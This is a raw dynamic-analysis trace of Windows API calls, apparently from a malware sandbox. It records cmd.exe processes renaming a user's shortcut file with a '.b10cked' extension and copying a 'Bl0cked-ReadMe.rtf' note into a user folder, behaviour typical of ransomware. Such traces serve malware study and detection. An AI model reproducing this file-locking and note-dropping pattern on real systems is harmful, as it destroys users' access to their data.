lpVolumeNameBuffer=0x1ef3fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef3f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef3f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0210.945] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0210.945] _wcsicmp (_String1="WEBSLI~1.URL", _String2=".") returned 73 [0210.945] _wcsicmp (_String1="WEBSLI~1.URL", _String2="..") returned 73 [0210.945] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL" (normalized: "c:\\users\\default\\favori~1\\links\\websli~1.url")) returned 0x20 [0210.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x381e70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.946] SetErrorMode (uMode=0x0) returned 0x0 [0210.946] SetErrorMode (uMode=0x1) returned 0x0 [0210.946] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", nBufferLength=0x104, 
lpBuffer=0x1eed84, lpFilePart=0x1eed6c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", lpFilePart=0x1eed6c*="WEBSLI~1.URL") returned 0x2c [0210.946] SetErrorMode (uMode=0x0) returned 0x1 [0210.946] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links" (normalized: "c:\\users\\default\\favori~1\\links")) returned 0x11 [0210.946] _wcsicmp (_String1="WEBSLI~1.URL", _String2=".") returned 73 [0210.946] _wcsicmp (_String1="WEBSLI~1.URL", _String2="..") returned 73 [0210.946] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL" (normalized: "c:\\users\\default\\favori~1\\links\\websli~1.url")) returned 0x20 [0210.946] SetErrorMode (uMode=0x0) returned 0x0 [0210.946] SetErrorMode (uMode=0x1) returned 0x0 [0210.946] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", nBufferLength=0x104, lpBuffer=0x1ef200, lpFilePart=0x1eef98 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", lpFilePart=0x1eef98*="WEBSLI~1.URL") returned 0x2c [0210.946] SetErrorMode (uMode=0x0) returned 0x1 [0210.946] SetErrorMode (uMode=0x0) returned 0x0 [0210.946] SetErrorMode (uMode=0x1) returned 0x0 [0210.946] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", nBufferLength=0x104, lpBuffer=0x1ef408, lpFilePart=0x1eef98 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", lpFilePart=0x1eef98*="Web Slice Gallery.url.b10cked") returned 0x3d [0210.946] SetErrorMode (uMode=0x0) returned 0x1 [0210.947] SetLastError (dwErrCode=0x0) [0210.947] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url.b10cked")) returned 0xffffffff [0210.947] GetLastError () returned 0x2 [0210.947] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", fInfoLevelId=0x1, 
lpFindFileData=0x1ee914, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee914) returned 0x370eb8 [0210.947] FindNextFileW (in: hFindFile=0x370eb8, lpFindFileData=0x1ee914 | out: lpFindFileData=0x1ee914) returned 0 [0210.947] GetLastError () returned 0x12 [0210.947] FindClose (in: hFindFile=0x370eb8 | out: hFindFile=0x370eb8) returned 1 [0210.948] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", fInfoLevelId=0x1, lpFindFileData=0x381c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381c10) returned 0x370eb8 [0210.949] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", nBufferLength=0x104, lpBuffer=0x1eebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", lpFilePart=0x0) returned 0x3d [0210.949] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url", nBufferLength=0x104, lpBuffer=0x1eebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url", lpFilePart=0x0) returned 0x35 [0210.949] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url")) returned 0x20 [0210.949] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url.b10cked"), dwFlags=0x3) returned 1 [0210.949] FindClose (in: hFindFile=0x370eb8 | out: hFindFile=0x370eb8) returned 1 [0210.949] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eeb60 | out: _Buffer=" 1") returned 9 [0210.949] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0210.949] GetFileType (hFile=0x7) returned 0x2 [0211.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0211.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeaec | out: lpMode=0x1eeaec) returned 1 [0211.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.047] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb20 | out: lpConsoleScreenBufferInfo=0x1eeb20) returned 1 [0211.047] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0211.047] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeb60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0211.047] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eeb44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeb44*=0x1a) returned 1 [0211.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.048] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.048] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.048] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.048] SetConsoleInputExeNameW () returned 0x1 [0211.048] GetConsoleOutputCP () returned 0x1b5 [0211.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.048] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.048] exit (_Code=0) Process: id = "514" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x370" os_integrity_level = "0x3000" os_privileges = "0x60800000" 
monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30989 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30990 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30991 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30992 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 30993 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30994 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30995 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id 
= 30996 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30997 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30998 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31033 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31034 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31035 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31036 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 31037 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31038 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31039 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31040 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31041 start_va = 
0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31042 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31043 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31044 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31045 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31046 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31047 start_va = 0x470000 end_va = 0x537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 31048 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31049 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31050 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000000c0000" filename = "" Region: id = 31051 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31052 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31053 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31054 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 31055 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 31056 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Thread: id = 714 os_tid = 0x938 [0210.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fbb4 | out: lpSystemTimeAsFileTime=0x22fbb4*(dwLowDateTime=0xb28fc420, dwHighDateTime=0x1d440a9)) [0210.969] GetCurrentProcessId () returned 0x370 [0210.969] GetCurrentThreadId () returned 0x938 [0210.969] GetTickCount () returned 0x3b376 [0210.969] QueryPerformanceCounter (in: lpPerformanceCount=0x22fbac | out: lpPerformanceCount=0x22fbac*=26775853588) returned 1 [0210.970] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0210.970] __set_app_type (_Type=0x1) [0210.970] __p__fmode () returned 0x76b331f4 [0210.970] __p__commode () returned 0x76b331fc [0210.970] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0210.970] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0210.970] GetCurrentThreadId () returned 0x938 [0210.970] OpenThread 
(dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x938) returned 0x38 [0210.971] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.971] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0210.971] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.971] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.971] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fb44 | out: phkResult=0x22fb44*=0x0) returned 0x2 [0210.971] VirtualQuery (in: lpAddress=0x22fb7b, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.971] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fb14, dwLength=0x1c | out: lpBuffer=0x22fb14*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0210.971] GetConsoleOutputCP () returned 0x1b5 [0210.971] GetCPInfo (in: 
CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.971] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0210.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.971] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0210.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.972] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.972] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.972] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.972] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0210.972] GetEnvironmentStringsW () returned 0x2c0180* [0210.972] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0210.972] GetEnvironmentStringsW () returned 0x2c0180* [0210.973] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0210.973] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eab4 | out: phkResult=0x22eab4*=0x40) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0xa8, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x1, 
lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x0, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegCloseKey (hKey=0x40) returned 0x0 [0210.973] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eab4 | out: phkResult=0x22eab4*=0x40) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x40, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x1, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x0, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x9, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x4, lpData=0x22eac0*=0x9, lpcbData=0x22eab8*=0x4) returned 0x0 [0210.973] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eabc, lpData=0x22eac0, lpcbData=0x22eab8*=0x1000 | out: lpType=0x22eabc*=0x0, lpData=0x22eac0*=0x9, lpcbData=0x22eab8*=0x1000) returned 0x2 [0210.973] RegCloseKey (hKey=0x40) returned 0x0 [0210.973] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ad [0210.973] srand (_Seed=0x5b8863ad) [0210.973] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"" [0210.973] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"" [0210.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0210.974] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
